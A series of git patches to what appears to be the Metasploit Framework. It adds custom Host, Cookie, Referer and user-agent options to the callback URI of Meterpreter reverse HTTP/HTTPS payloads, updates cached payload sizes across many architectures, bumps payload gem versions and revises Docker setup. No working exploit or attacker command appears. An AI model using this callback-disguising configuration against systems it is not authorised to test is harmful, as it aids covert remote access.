a/lib/msf/base/sessions/mettle_config.rb +++ b/lib/msf/base/sessions/mettle_config.rb @@ -27,6 +27,10 @@ module Msf generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid]) end + def generate_uri_option(opts, opt) + opts[opt] ? "--#{opt} '#{opts[opt].gsub(/'/, "\\'")}' " : '' + end + def generate_http_uri(opts) if Rex::Socket.is_ipv6?(opts[:lhost]) target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" @@ -38,7 +42,15 @@ module Msf target_uri << opts[:lport].to_s target_uri << luri target_uri << generate_uri(opts) - target_uri + target_uri << '|' + target_uri << generate_uri_option(opts, :ua) + target_uri << generate_uri_option(opts, :host) + target_uri << generate_uri_option(opts, :referer) + if opts[:cookie] + opts[:header] = "Cookie: #{opts[:cookie]}" + target_uri << generate_uri_option(opts, :header) + end + target_uri.strip end def generate_tcp_uri(opts) @@ -57,14 +69,11 @@ module Msf case opts[:scheme] when 'http' - transport = transport_config_reverse_http(opts) - opts[:uri] = generate_http_uri(transport) + opts[:uri] = generate_http_uri(transport_config_reverse_http(opts)) when 'https' - transport = transport_config_reverse_https(opts) - opts[:uri] = generate_http_uri(transport) + opts[:uri] = generate_http_uri(transport_config_reverse_https(opts)) when 'tcp' - transport = transport_config_reverse_tcp(opts) - opts[:uri] = generate_tcp_uri(transport) + opts[:uri] = generate_tcp_uri(transport_config_reverse_tcp(opts)) else raise ArgumentError, "Unknown scheme: #{opts[:scheme]}" end @@ -74,7 +83,7 @@ module Msf unless opts[:stageless] == true guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') end - opts[:session_guid] = Base64.encode64(guid) + opts[:session_guid] = Base64.encode64(guid).strip opts.slice(:uuid, :session_guid, :uri, :debug, :log_file) end diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 7258561544..84e257bcce 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -66,6 +66,9 @@ module Msf::Payload::TransportConfig proxy_type: ds['HttpProxyType'], proxy_user: ds['HttpProxyUser'], proxy_pass: ds['HttpProxyPass'], + host: ds['HttpHostHeader'], + cookie: ds['HttpCookie'], + referer: ds['HttpReferer'], custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 594a372aa0..49feede5fa 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.3.15' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.5' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 3a9e4e3e27..74c9255f11 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 692384 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index d5eda3afaf..b1c6ffcd4e 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 692384 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 3400e28e34..d6818b4eb2 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 692384 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index bd32104cce..f44197a497 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 678568 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 073d4b31b3..6341bee2ae 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 678568 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index d2d13aedc0..634b6560ef 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 678568 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index e03945a404..cf5d0c6be7 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 677296 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index e31c66b376..ed339b08b0 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 677296 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 8bd8a3cc05..50080e27d1 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 677296 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 10f36f74d8..5d755982a8 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1077640 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index e0beb782fe..d38aa97904 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1077640 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index c965638d7e..ea96d086d2 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1077640 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index d1749f9c25..8ab191d710 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bc1d3f2c08..b3aa33d864 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index cc021b9ff2..fce512c439 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index a98f452a62..35b4a3ada0 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1053540 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 258bd4192f..e92e5319f3 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1053540 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 78b4d6b8d7..ab9bbd211b 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1053540 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 83aa882cc2..684af558e5 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 9b0c40b47f..92fad1845a 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 7832e02b38..5a607842fd 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index d7d893c797..20d3b4aa74 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 856312 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 43922b34f8..d0fed27439 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 856312 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 28f1df859a..5c649a25c9 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 856312 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index a568253314..679a3765fc 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb index 01adfad676..f33ddf8cbb 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb index 8f13d5b934..21eb56cde1 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 07d84a9546..0fb3aaea5e 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 745472 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 1b019f6ea9..6745bb5f9b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 745472 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index d039699b84..0cc26899f3 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 745472 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index af7e1d5c24..c7da73f173 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 793296 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 6ce43b87f7..ac313d906c 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 793296 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 1f2fb19f4f..d72061e2cc 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 793296 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index c678a47d9e..a129f3834a 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 905864 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 76be12d28d..9372c91415 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 905864 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 85223495a7..6e099ef231 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 905864 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index a8d519d10c..f1b9a907df 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 789068 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index 07bb971461..264643fb7d 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 789068 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index d1eeb5d196..a4d7677fd4 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 789068 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions From 035d1ef2c63b0729d2689e4599016b328493db69 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sat, 25 Nov 2017 18:21:57 -0600 Subject: [PATCH 208/254] bump payloads, pull in AES negotation & transport fixes --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index dfcf9d1632..50977088a9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.15) + metasploit-payloads (= 1.3.17) metasploit_data_models metasploit_payloads-mettle (= 0.2.8) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.15) + metasploit-payloads (1.3.17) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 49feede5fa..cb469296e6 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.15' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.17' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components From 50351320d779389ff911ccf72e26d73dba5c952f Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 28 Nov 2017 21:35:20 +0100 Subject: [PATCH 209/254] more docker work --- .dockerignore | 2 +- .gitignore | 1 + Dockerfile | 14 +++--- ...verride.yml => docker-compose.override.yml | 5 +- docker-compose.yml | 9 ++-- docker/README.md | 48 ++++++------------- docker/bin/msfconsole | 10 ++-- docker/bin/msfconsole-dev | 27 ----------- docker/bin/msfvenom | 14 ++++-- docker/bin/msfvenom-dev | 26 ---------- lib/msf/ui/console/command_dispatcher/db.rb | 2 + 11 files changed, 49 insertions(+), 109 deletions(-) rename docker/docker-compose.development.override.yml => docker-compose.override.yml (78%) delete mode 100755 docker/bin/msfconsole-dev delete mode 100755 docker/bin/msfvenom-dev diff --git a/.dockerignore b/.dockerignore index a066428ead..b6add3b6e4 100644 --- a/.dockerignore +++ b/.dockerignore @@ -34,7 +34,7 @@ config/database.yml # target config file for testing features/support/targets.yml # simplecov coverage data -coverage +coverage/ doc/ external/source/meterpreter/java/bin external/source/meterpreter/java/build diff --git a/.gitignore b/.gitignore index 233af3374f..8398940932 100644 --- a/.gitignore +++ b/.gitignore @@ -88,6 +88,7 @@ data/meterpreter/ext_server_pivot.*.dll # local docker compose overrides docker-compose.local* +.env # Ignore python bytecode *.pyc diff --git a/Dockerfile b/Dockerfile index e4cfb5517e..f6c0007042 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,14 +1,17 @@ FROM ruby:2.4.2-alpine -MAINTAINER Rapid7 +LABEL maintainer="Rapid7" ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" ENV APP_HOME /usr/src/metasploit-framework/ ENV MSF_USER msf ENV NMAP_PRIVILEGED="" +ENV BUNDLE_IGNORE_MESSAGES="true" WORKDIR $APP_HOME -COPY Gemfile* m* Rakefile $APP_HOME -COPY lib $APP_HOME/lib +COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME +COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb +COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb +COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb RUN apk update && \ apk add \ @@ -36,8 +39,7 @@ RUN apk update && \ ncurses-dev \ git \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ - # this currently fails: https://github.com/rubygems/rubygems/issues/2064 - # && gem update --system \ + && gem update --system \ && gem install bundler \ && bundle install --system $BUNDLER_ARGS \ && apk del .ruby-builddeps \ @@ -46,7 +48,7 @@ RUN apk update && \ RUN adduser -g msfconsole -D $MSF_USER RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) -RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap +RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap) USER $MSF_USER diff --git a/docker/docker-compose.development.override.yml b/docker-compose.override.yml similarity index 78% rename from docker/docker-compose.development.override.yml rename to docker-compose.override.yml index f4ac60633a..134c1e8503 100644 --- a/docker/docker-compose.development.override.yml +++ b/docker-compose.override.yml @@ -1,13 +1,14 @@ -version: '2' +version: '3' services: ms: build: + context: . + dockerfile: ./Dockerfile args: BUNDLER_ARGS: --jobs=8 image: metasploit:dev environment: DATABASE_URL: postgres://postgres@db:5432/msf_dev - volumes: - .:/usr/src/metasploit-framework diff --git a/docker-compose.yml b/docker-compose.yml index 0f433b31fe..725f398500 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,10 +1,7 @@ -version: '2' +version: '3' services: ms: - image: metasploit - build: - context: . - dockerfile: ./Dockerfile + image: metasploitframework/metasploit-framework:latest environment: DATABASE_URL: postgres://postgres@db:5432/msf links: @@ -16,7 +13,7 @@ services: - /etc/localtime:/etc/localtime:ro db: - image: postgres:9-alpine + image: postgres:10-alpine volumes: - pg_data:/var/lib/postgresql/data diff --git a/docker/README.md b/docker/README.md index a137b8c327..cec9d02070 100644 --- a/docker/README.md +++ b/docker/README.md @@ -3,43 +3,36 @@ To run `msfconsole` ```bash +docker-compose build docker-compose run --rm --service-ports ms ``` +or +```bash +./docker/bin/msfconsole +``` To run `msfvenom` ```bash -docker-compose run --rm ms ./msfvenom +docker-compose build +docker-compose run --rm --no-deps ms ./msfvenom ``` - -### I don't like typing `docker-compose --rm ...` - -We have included some binstubs `./bin`, you can symlink them to your path. - -Assuming you have `$HOME/bin`, and it's in your `$PATH`. You can run this from the project root: - +or ```bash -ln -s `pwd`/docker/bin/msfconsole $HOME/bin/ 